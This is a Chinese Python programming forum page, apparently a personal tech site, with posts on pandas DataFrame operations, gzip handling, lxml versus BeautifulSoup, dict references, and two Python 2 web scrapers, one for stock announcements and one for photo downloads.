ubuntu的pycharm中文注释显示乱码 ?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 10498 次浏览 • 2016-07-25 12:22 • 来自相关话题

python sqlite 插入的数据含有变量,结果不一致

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 7551 次浏览 • 2016-07-18 07:50 • 来自相关话题

使用pandas的dataframe数据进行操作的总结

李魔佛 发表了文章 • 0 个评论 • 5650 次浏览 • 2016-07-17 16:47 • 来自相关话题

t = df.iloc[0]<class 'pandas.core.series.Series'>
 
#使用iloc后,t已经变成了一个子集。 已经不再是一个dataframe数据。 所以你使用 t['high'] 返回的是一个值。此时t已经没有index了,如果这个时候调用 t.index
 
t=df[:1]
class 'pandas.core.frame.DataFrame'>
 
#这是返回的是一个DataFrame的一个子集。 此时 你可以继续用dateFrame的一些方法进行操作。
 
 
 
 
 
删除dataframe中某一行
 
df.drop()
 
df的内容如下:





 
    df.drop(df[df[u'代码']==300141.0].index,inplace=True)
    print df
 
输出如下





 
记得参数inplace=True, 因为默认的值为inplace=False,意思就是你不添加的话就使用Falase这个值。
这样子原来的df不会被修改, 只是会返回新的修改过的df。 这样的话需要用一个新变量来承接它
new_df=df.drop(df[df[u'代码']==300141.0].index)
 

判断DataFrame为None
  if df is None:
print "None len==0"
return False
  查看全部
t = df.iloc[0]<class 'pandas.core.series.Series'>
 
#使用iloc后,t已经变成了一个子集。 已经不再是一个dataframe数据。 所以你使用 t['high'] 返回的是一个值。此时t已经没有index了,如果这个时候调用 t.index
 
t=df[:1]
class 'pandas.core.frame.DataFrame'>
 
#这是返回的是一个DataFrame的一个子集。 此时 你可以继续用dateFrame的一些方法进行操作。
 
 
 
 
 
删除dataframe中某一行
 
df.drop()
 
df的内容如下:

drop.PNG

 
    df.drop(df[df[u'代码']==300141.0].index,inplace=True)
    print df
 
输出如下

after_drop.PNG

 
记得参数inplace=True, 因为默认的值为inplace=False,意思就是你不添加的话就使用Falase这个值。
这样子原来的df不会被修改, 只是会返回新的修改过的df。 这样的话需要用一个新变量来承接它
new_df=df.drop(df[df[u'代码']==300141.0].index)
 

判断DataFrame为None
 
    if df is None:
print "None len==0"
return False

 

pycharm 添加了中文注释后无法运行?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 6154 次浏览 • 2016-07-14 17:56 • 来自相关话题

python 爬虫下载的图片打不开?

李魔佛 发表了文章 • 0 个评论 • 6848 次浏览 • 2016-07-09 17:33 • 来自相关话题

 
代码如下片段
 
__author__ = 'rocky'
import urllib,urllib2,StringIO,gzip
url="http://image.xitek.com/photo/2 ... ot%3B
filname=url.split("/")[-1]
req=urllib2.Request(url)
resp=urllib2.urlopen(req)
content=resp.read()
#data = StringIO.StringIO(content)
#gzipper = gzip.GzipFile(fileobj=data)
#html = gzipper.read()
f=open(filname,'w')
f.write()
f.close()

运行后生成的文件打开后不显示图片。
 
后来调试后发现,如果要保存为图片格式, 文件的读写需要用'wb', 也就是上面代码中
f=open(filname,'w') 改一下 改成

f=open(filname,'wb')
 
就可以了。
  查看全部
 
代码如下片段
 
__author__ = 'rocky'
import urllib,urllib2,StringIO,gzip
url="http://image.xitek.com/photo/2 ... ot%3B
filname=url.split("/")[-1]
req=urllib2.Request(url)
resp=urllib2.urlopen(req)
content=resp.read()
#data = StringIO.StringIO(content)
#gzipper = gzip.GzipFile(fileobj=data)
#html = gzipper.read()
f=open(filname,'w')
f.write()
f.close()

运行后生成的文件打开后不显示图片。
 
后来调试后发现,如果要保存为图片格式, 文件的读写需要用'wb', 也就是上面代码中
f=open(filname,'w') 改一下 改成

f=open(filname,'wb')
 
就可以了。
 

判断网页内容是否经过gzip压缩 python代码

李魔佛 发表了文章 • 0 个评论 • 3758 次浏览 • 2016-07-09 15:10 • 来自相关话题

同一个网页某些页面会通过gzip压缩网页内容,给正常的爬虫造成一定的错误干扰。
 
那么可以在代码中添加一个判断,判断网页内容是否经过gzip压缩,是的话多一个处理就可以了。
 





 
同一个网页某些页面会通过gzip压缩网页内容,给正常的爬虫造成一定的错误干扰。
 
那么可以在代码中添加一个判断,判断网页内容是否经过gzip压缩,是的话多一个处理就可以了。
 

gzip.PNG

 

python 编写火车票抢票软件

李魔佛 发表了文章 • 2 个评论 • 13813 次浏览 • 2016-06-30 15:55 • 来自相关话题

项目:python 编写火车票抢票软件
实现日期:2016.7.30
项目:python 编写火车票抢票软件
实现日期:2016.7.30

python 获取 中国证券网 的公告

python爬虫李魔佛 发表了文章 • 11 个评论 • 20763 次浏览 • 2016-06-30 15:45 • 来自相关话题

中国证券网: http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点,而且还出现过早上中国证券网已经发了公告,而东财却拿去做午间公告,以至于可以提前获取公告提前埋伏。
 
现在程序自动把抓取的公告存入本网站中:http://30daydo.com/news.php 
每天早上8:30更新一次。
 
生成的公告保存在stock/文件夹下,以日期命名。 下面脚本是循坏检测,如果有新的公告就会继续生成。
 
默认保存前3页的公告。(一次过太多页会被网站暂时屏蔽几分钟)。 代码以及使用了切换header来躲避网站的封杀。
 
修改
getInfo(3) 里面的数字就可以抓取前面某页数据
 
 




__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os,sys


def getInfo(max_index_user=5):
stock_news_site =
"http://ggjd.cnstock.com/gglist/search/ggkx/"

my_userAgent = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
index = 0
max_index = max_index_user
num = 1
temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

store_filename = "StockNews-%s.log" % temp_time
fOpen = codecs.open(store_filename, 'w', 'utf-8')

while index < max_index:
user_agent = random.choice(my_userAgent)
# print user_agent
company_news_site = stock_news_site + str(index)
# content = urllib2.urlopen(company_news_site)
headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
'Accept': 'text/html, application/xhtml+xml, */*', }
req = urllib2.Request(url=company_news_site, headers=headers)
resp = None
raw_content = ""
try:
resp = urllib2.urlopen(req, timeout=30)

except urllib2.HTTPError as e:
e.fp.read()
except urllib2.URLError as e:
if hasattr(e, 'code'):
print "error code %d" % e.code
elif hasattr(e, 'reason'):
print "error reason %s " % e.reason

finally:
if resp:
raw_content = resp.read()
time.sleep(2)
resp.close()

soup = BeautifulSoup(raw_content, "html.parser")
all_content = soup.find_all("span", "time")

for i in all_content:
news_time = i.string
node = i.next_sibling
str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
#print "inside %d" %num
#print str_temp
fOpen.write(str_temp)
num = num + 1

#print "index %d" %index
index = index + 1

fOpen.close()


def execute_task(n=60):
period = int(n)
while True:
print datetime.datetime.now()
getInfo(3)

time.sleep(60 * period)



if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "stock")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
start_time = time.time() # user can change the max index number getInfo(10), by default is getInfo(5)
if len(sys.argv) <2:
n = raw_input("Input Period : ? mins to download every cycle")
else:
n=int(sys.argv[1])
execute_task(n)
end_time = time.time()
print "Total time: %s s." % str(round((end_time - start_time), 4))


 
github:https://github.com/Rockyzsu/cnstock
  查看全部
中国证券网: http://ggjd.cnstock.com/
这个网站的公告会比同花顺东方财富的早一点,而且还出现过早上中国证券网已经发了公告,而东财却拿去做午间公告,以至于可以提前获取公告提前埋伏。
 
现在程序自动把抓取的公告存入本网站中:http://30daydo.com/news.php 
每天早上8:30更新一次。
 
生成的公告保存在stock/文件夹下,以日期命名。 下面脚本是循坏检测,如果有新的公告就会继续生成。
 
默认保存前3页的公告。(一次过太多页会被网站暂时屏蔽几分钟)。 代码以及使用了切换header来躲避网站的封杀。
 
修改
getInfo(3) 里面的数字就可以抓取前面某页数据
 
 

公告.PNG
__author__ = 'rocchen'
# working v1.0
from bs4 import BeautifulSoup
import urllib2, datetime, time, codecs, cookielib, random, threading
import os,sys


def getInfo(max_index_user=5):
stock_news_site =
"http://ggjd.cnstock.com/gglist/search/ggkx/"

my_userAgent = [
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11',
'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)']
index = 0
max_index = max_index_user
num = 1
temp_time = time.strftime("[%Y-%m-%d]-[%H-%M]", time.localtime())

store_filename = "StockNews-%s.log" % temp_time
fOpen = codecs.open(store_filename, 'w', 'utf-8')

while index < max_index:
user_agent = random.choice(my_userAgent)
# print user_agent
company_news_site = stock_news_site + str(index)
# content = urllib2.urlopen(company_news_site)
headers = {'User-Agent': user_agent, 'Host': "ggjd.cnstock.com", 'DNT': '1',
'Accept': 'text/html, application/xhtml+xml, */*', }
req = urllib2.Request(url=company_news_site, headers=headers)
resp = None
raw_content = ""
try:
resp = urllib2.urlopen(req, timeout=30)

except urllib2.HTTPError as e:
e.fp.read()
except urllib2.URLError as e:
if hasattr(e, 'code'):
print "error code %d" % e.code
elif hasattr(e, 'reason'):
print "error reason %s " % e.reason

finally:
if resp:
raw_content = resp.read()
time.sleep(2)
resp.close()

soup = BeautifulSoup(raw_content, "html.parser")
all_content = soup.find_all("span", "time")

for i in all_content:
news_time = i.string
node = i.next_sibling
str_temp = "No.%s \n%s\t%s\n---> %s \n\n" % (str(num), news_time, node['title'], node['href'])
#print "inside %d" %num
#print str_temp
fOpen.write(str_temp)
num = num + 1

#print "index %d" %index
index = index + 1

fOpen.close()


def execute_task(n=60):
period = int(n)
while True:
print datetime.datetime.now()
getInfo(3)

time.sleep(60 * period)



if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "stock")
if not os.path.exists(sub_folder):
os.mkdir(sub_folder)
os.chdir(sub_folder)
start_time = time.time() # user can change the max index number getInfo(10), by default is getInfo(5)
if len(sys.argv) <2:
n = raw_input("Input Period : ? mins to download every cycle")
else:
n=int(sys.argv[1])
execute_task(n)
end_time = time.time()
print "Total time: %s s." % str(round((end_time - start_time), 4))


 
github:https://github.com/Rockyzsu/cnstock
 

为什么beautifulsoup的children不能用列表索引index去返回值 ?

回复

李魔佛 回复了问题 • 1 人关注 • 1 个回复 • 6142 次浏览 • 2016-06-29 22:10 • 来自相关话题

python 下使用beautifulsoup还是lxml ?

李魔佛 发表了文章 • 0 个评论 • 7328 次浏览 • 2016-06-29 18:29 • 来自相关话题

刚开始接触爬虫是从beautifulsoup开始的,觉得beautifulsoup很好用。 然后后面又因为使用scrapy的缘故,接触到lxml。 到底哪一个更加好用?
 
然后看了下beautifulsoup的源码,其实现原理使用的是正则表达式,而lxml使用的节点递归的技术。
 

Don't use BeautifulSoup, use lxml.soupparser then you're sitting on top of the power of lxml and can use the good bits of BeautifulSoup which is to deal with really broken and crappy HTML.
 
 
 
9down vote
In summary, lxml is positioned as a lightning-fast production-quality html and xml parser that, by the way, also includes a soupparser module to fall back on BeautifulSoup's functionality. BeautifulSoupis a one-person project, designed to save you time to quickly extract data out of poorly-formed html or xml.
lxml documentation says that both parsers have advantages and disadvantages. For this reason, lxml provides a soupparser so you can switch back and forth. Quoting,
[quote]
BeautifulSoup uses a different parsing approach. It is not a real HTML parser but uses regular expressions to dive through tag soup. It is therefore more forgiving in some cases and less good in others. It is not uncommon that lxml/libxml2 parses and fixes broken HTML better, but BeautifulSoup has superiour support for encoding detection. It very much depends on the input which parser works better.

In the end they are saying,

The downside of using this parser is that it is much slower than the HTML parser of lxml. So if performance matters, you might want to consider using soupparser only as a fallback for certain cases.

If I understand them correctly, it means that the soup parser is more robust --- it can deal with a "soup" of malformed tags by using regular expressions --- whereas lxml is more straightforward and just parses things and builds a tree as you would expect. I assume it also applies to BeautifulSoup itself, not just to the soupparser for lxml.
They also show how to benefit from BeautifulSoup's encoding detection, while still parsing quickly with lxml:[code]>>> from BeautifulSoup import UnicodeDammit

>>> def decode_html(html_string):
... converted = UnicodeDammit(html_string, isHTML=True)
... if not converted.unicode:
... raise UnicodeDecodeError(
... "Failed to detect encoding, tried [%s]",
... ', '.join(converted.triedEncodings))
... # print converted.originalEncoding
... return converted.unicode

>>> root = lxml.html.fromstring(decode_html(tag_soup))[/code]
(Same source: http://lxml.de/elementsoup.html).
In words of BeautifulSoup's creator,

That's it! Have fun! I wrote Beautiful Soup to save everybody time. Once you get used to it, you should be able to wrangle data out of poorly-designed websites in just a few minutes. Send me email if you have any comments, run into problems, or want me to know about your project that uses Beautiful Soup.[code] --Leonard[/code]

Quoted from the Beautiful Soup documentation.
I hope this is now clear. The soup is a brilliant one-person project designed to save you time to extract data out of poorly-designed websites. The goal is to save you time right now, to get the job done, not necessarily to save you time in the long term, and definitely not to optimize the performance of your software.
Also, from the lxml website,

lxml has been downloaded from the Python Package Index more than two million times and is also available directly in many package distributions, e.g. for Linux or MacOS-X.

And, from Why lxml?,

The C libraries libxml2 and libxslt have huge benefits:... Standards-compliant... Full-featured... fast. fast! FAST! ... lxml is a new Python binding for libxml2 and libxslt...

[/quote]
意思大概就是 不要用Beautifulsoup,使用lxml, lxml才能让你提要到让你体会到html节点解析的速度之快。
 
   查看全部
刚开始接触爬虫是从beautifulsoup开始的,觉得beautifulsoup很好用。 然后后面又因为使用scrapy的缘故,接触到lxml。 到底哪一个更加好用?
 
然后看了下beautifulsoup的源码,其实现原理使用的是正则表达式,而lxml使用的节点递归的技术。
 


Don't use BeautifulSoup, use lxml.soupparser then you're sitting on top of the power of lxml and can use the good bits of BeautifulSoup which is to deal with really broken and crappy HTML.
 
 
 
9down vote
In summary, 

lxml
 is positioned as a lightning-fast production-quality html and xml parser that, by the way, also includes a 
soupparser
 module to fall back on BeautifulSoup's functionality. 
BeautifulSoup
is a one-person project, designed to save you time to quickly extract data out of poorly-formed html or xml.
lxml documentation says that both parsers have advantages and disadvantages. For this reason, 
lxml
 provides a 
soupparser
 so you can switch back and forth. Quoting,
[quote]
BeautifulSoup uses a different parsing approach. It is not a real HTML parser but uses regular expressions to dive through tag soup. It is therefore more forgiving in some cases and less good in others. It is not uncommon that lxml/libxml2 parses and fixes broken HTML better, but BeautifulSoup has superiour support for encoding detection. It very much depends on the input which parser works better.


In the end they are saying,


The downside of using this parser is that it is much slower than the HTML parser of lxml. So if performance matters, you might want to consider using soupparser only as a fallback for certain cases.


If I understand them correctly, it means that the soup parser is more robust --- it can deal with a "soup" of malformed tags by using regular expressions --- whereas 
lxml
 is more straightforward and just parses things and builds a tree as you would expect. I assume it also applies to 
BeautifulSoup
 itself, not just to the 
soupparser
 for 
lxml
.
They also show how to benefit from 
BeautifulSoup
's encoding detection, while still parsing quickly with 
lxml
:
[code]>>> from BeautifulSoup import UnicodeDammit

>>> def decode_html(html_string):
... converted = UnicodeDammit(html_string, isHTML=True)
... if not converted.unicode:
... raise UnicodeDecodeError(
... "Failed to detect encoding, tried [%s]",
... ', '.join(converted.triedEncodings))
... # print converted.originalEncoding
... return converted.unicode

>>> root = lxml.html.fromstring(decode_html(tag_soup))
[/code]
(Same source: http://lxml.de/elementsoup.html).
In words of 
BeautifulSoup
's creator,


That's it! Have fun! I wrote Beautiful Soup to save everybody time. Once you get used to it, you should be able to wrangle data out of poorly-designed websites in just a few minutes. Send me email if you have any comments, run into problems, or want me to know about your project that uses Beautiful Soup.

[code] --Leonard
[/code]


Quoted from the Beautiful Soup documentation.
I hope this is now clear. The soup is a brilliant one-person project designed to save you time to extract data out of poorly-designed websites. The goal is to save you time right now, to get the job done, not necessarily to save you time in the long term, and definitely not to optimize the performance of your software.
Also, from the lxml website,


lxml has been downloaded from the Python Package Index more than two million times and is also available directly in many package distributions, e.g. for Linux or MacOS-X.


And, from Why lxml?,


The C libraries libxml2 and libxslt have huge benefits:... Standards-compliant... Full-featured... fast. fast! FAST! ... lxml is a new Python binding for libxml2 and libxslt...


[/quote]
意思大概就是 不要用Beautifulsoup,使用lxml, lxml才能让你提要到让你体会到html节点解析的速度之快。
 
  

python 批量获取色影无忌 获奖图片

python爬虫李魔佛 发表了文章 • 6 个评论 • 15993 次浏览 • 2016-06-29 16:41 • 来自相关话题

色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 





 
不多说,直接来代码:#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








下载后在content文件夹下会自动抓取所有图片。 (色影无忌的服务器没有做任何的屏蔽处理,所以脚本不能跑那么快,可以适当调用sleep函数,不要让服务器压力那么大)
 
已经下载好的图片:





 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star) 查看全部
色影无忌上的图片很多都可以直接拿来做壁纸的,而且发布面不会太广,基本不会和市面上大部分的壁纸或者图片素材重复。 关键还没有水印。 这么良心的图片服务商哪里找呀~~
 

 

色影无忌_副本.png

 
不多说,直接来代码:
#-*-coding=utf-8-*-
__author__ = 'rocky chen'
from bs4 import BeautifulSoup
import urllib2,sys,StringIO,gzip,time,random,re,urllib,os
reload(sys)
sys.setdefaultencoding('utf-8')
class Xitek():
    def __init__(self):
        self.url="http://photo.xitek.com/"
        user_agent="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
        self.headers={"User-Agent":user_agent}
        self.last_page=self.__get_last_page()


    def __get_last_page(self):
        html=self.__getContentAuto(self.url)
        bs=BeautifulSoup(html,"html.parser")
        page=bs.find_all('a',class_="blast")
        last_page=page[0]['href'].split('/')[-1]
        return int(last_page)


    def __getContentAuto(self,url):
        req=urllib2.Request(url,headers=self.headers)
        resp=urllib2.urlopen(req)
        #time.sleep(2*random.random())
        content=resp.read()
        info=resp.info().get("Content-Encoding")
        if info==None:
            return content
        else:
            t=StringIO.StringIO(content)
            gziper=gzip.GzipFile(fileobj=t)
            html = gziper.read()
            return html

    #def __getFileName(self,stream):


    def __download(self,url):
        p=re.compile(r'href="(/photoid/\d+)"')
        #html=self.__getContentNoZip(url)

        html=self.__getContentAuto(url)

        content = p.findall(html)
        for i in content:
            print i

            photoid=self.__getContentAuto(self.url+i)
            bs=BeautifulSoup(photoid,"html.parser")
            final_link=bs.find('img',class_="mimg")['src']
            print final_link
            #pic_stream=self.__getContentAuto(final_link)
            title=bs.title.string.strip()
            filename = re.sub('[\/:*?"<>|]', '-', title)
            filename=filename+'.jpg'
            urllib.urlretrieve(final_link,filename)
            #f=open(filename,'w')
            #f.write(pic_stream)
            #f.close()
        #print html
        #bs=BeautifulSoup(html,"html.parser")
        #content=bs.find_all(p)
        #for i in content:
        #    print i
        '''
        print bs.title
        element_link=bs.find_all('div',class_="element")
        print len(element_link)
        k=1
        for href in element_link:

            #print type(href)
            #print href.tag
        '''
        '''
            if href.children[0]:
                print href.children[0]
        '''
        '''
            t=0

            for i in href.children:
                #if i.a:
                if t==0:
                    #print k
                    if i['href']
                    print link

                        if p.findall(link):
                            full_path=self.url[0:len(self.url)-1]+link
                            sub_html=self.__getContent(full_path)
                            bs=BeautifulSoup(sub_html,"html.parser")
                            final_link=bs.find('img',class_="mimg")['src']
                            #time.sleep(2*random.random())
                            print final_link
                    #k=k+1
                #print type(i)
                #print i.tag
                #if hasattr(i,"href"):
                    #print i['href']
                #print i.tag
                t=t+1
                #print "*"

        '''

        '''
            if href:
                if href.children:
                    print href.children[0]
        '''
            #print "one element link"



    def getPhoto(self):

        start=0
        #use style/0
        photo_url="http://photo.xitek.com/style/0/p/"
        for i in range(start,self.last_page+1):
            url=photo_url+str(i)
            print url
            #time.sleep(1)
            self.__download(url)

        '''
        url="http://photo.xitek.com/style/0/p/10"
        self.__download(url)
        '''
        #url="http://photo.xitek.com/style/0/p/0"
        #html=self.__getContent(url)
        #url="http://photo.xitek.com/"
        #html=self.__getContentNoZip(url)
        #print html
        #'''
def main():
    sub_folder = os.path.join(os.getcwd(), "content")
    if not os.path.exists(sub_folder):
        os.mkdir(sub_folder)
    os.chdir(sub_folder)
    obj=Xitek()
    obj.getPhoto()


if __name__=="__main__":
    main()








下载后在content文件夹下会自动抓取所有图片。 (色影无忌的服务器没有做任何的屏蔽处理,所以脚本不能跑那么快,可以适当调用sleep函数,不要让服务器压力那么大)
 
已经下载好的图片:

色影无忌2_副本1.png

 
 
github: https://github.com/Rockyzsu/fetchXitek   (欢迎前来star)

python获取列表中的最大值

李魔佛 发表了文章 • 0 个评论 • 4745 次浏览 • 2016-06-29 16:35 • 来自相关话题

其实python提供了内置的max函数,直接调用即可。
 
list=[1,2,3,5,4,6,434,2323,333,99999]
print "max of list is ",
print max(list)
输出 99999 查看全部
其实python提供了内置的max函数,直接调用即可。
 
    list=[1,2,3,5,4,6,434,2323,333,99999]
print "max of list is ",
print max(list)

输出 99999

python使用lxml加载 html---xpath

李魔佛 发表了文章 • 0 个评论 • 2688 次浏览 • 2016-06-23 22:09 • 来自相关话题

首先确定安装了lxml。
然后按照以下代码去使用
 
#-*-coding=utf-8-*-
__author__ = 'rocchen'
from lxml import html
from lxml import etree
import urllib2

def lxml_test():
url="http://www.caixunzz.com"
req=urllib2.Request(url=url)
resp=urllib2.urlopen(req)
#print resp.read()

tree=etree.HTML(resp.read())
href=tree.xpath('//a[@class="label"]/@href')
#print href.tag
for i in href:
#print html.tostring(i)
#print type(i)
print i

print type(href)

lxml_test()

使用urllib2读取了网页内容,然后导入到lxml,为的就是使用xpath这个方便的函数。 比单纯使用beautifulsoup要方便的多。(个人认为) 查看全部
首先确定安装了lxml。
然后按照以下代码去使用
 
#-*-coding=utf-8-*-
__author__ = 'rocchen'
from lxml import html
from lxml import etree
import urllib2

def lxml_test():
url="http://www.caixunzz.com"
req=urllib2.Request(url=url)
resp=urllib2.urlopen(req)
#print resp.read()

tree=etree.HTML(resp.read())
href=tree.xpath('//a[@class="label"]/@href')
#print href.tag
for i in href:
#print html.tostring(i)
#print type(i)
print i

print type(href)

lxml_test()

使用urllib2读取了网页内容,然后导入到lxml,为的就是使用xpath这个方便的函数。 比单纯使用beautifulsoup要方便的多。(个人认为)

scrapy 爬虫执行之前 如何运行自定义的函数来初始化一些数据?

回复

低调的哥哥 回复了问题 • 2 人关注 • 1 个回复 • 9049 次浏览 • 2016-06-20 18:25 • 来自相关话题

python中字典赋值常见错误

李魔佛 发表了文章 • 0 个评论 • 3471 次浏览 • 2016-06-19 11:39 • 来自相关话题

初学Python,在学到字典时,出现了一个疑问,见下两个算例:
算例一:>>> x = { }
>>> y = x
>>> x = { 'a' : 'b' }
>>> y
>>> { }
算例二:>>> x = { }
>>> y = x
>>> x['a'] = 'b'
>>> y
>>> { 'a' : 'b' }

疑问:为什么算例一中,给x赋值后,y没变(还是空字典),而算例二中,对x进行添加项的操作后,y就会同步变化。
 
 
解答:

y = x 那么x,y 是对同一个对象的引用。
算例一
中x = { 'a' : 'b' } x引用了一个新的字典对象
所以出现你说的情况。
算例二:修改y,x 引用的同一字典,所以出现你说的情况。

可以加id(x), id(y) ,如果id() 函数的返回值相同,表示是对同一个对象的引用。


  查看全部
初学Python,在学到字典时,出现了一个疑问,见下两个算例:
算例一:
>>> x = { }
>>> y = x
>>> x = { 'a' : 'b' }
>>> y
>>> { }

算例二:
>>> x = { }
>>> y = x
>>> x['a'] = 'b'
>>> y
>>> { 'a' : 'b' }


疑问:为什么算例一中,给x赋值后,y没变(还是空字典),而算例二中,对x进行添加项的操作后,y就会同步变化。
 
 
解答:

y = x 那么x,y 是对同一个对象的引用。
算例一
中x = { 'a' : 'b' } x引用了一个新的字典对象
所以出现你说的情况。
算例二:修改y,x 引用的同一字典,所以出现你说的情况。

可以加id(x), id(y) ,如果id() 函数的返回值相同,表示是对同一个对象的引用。


 

ubuntu12.04 安装 scrapy 爬虫模块 一系列问题与解决办法

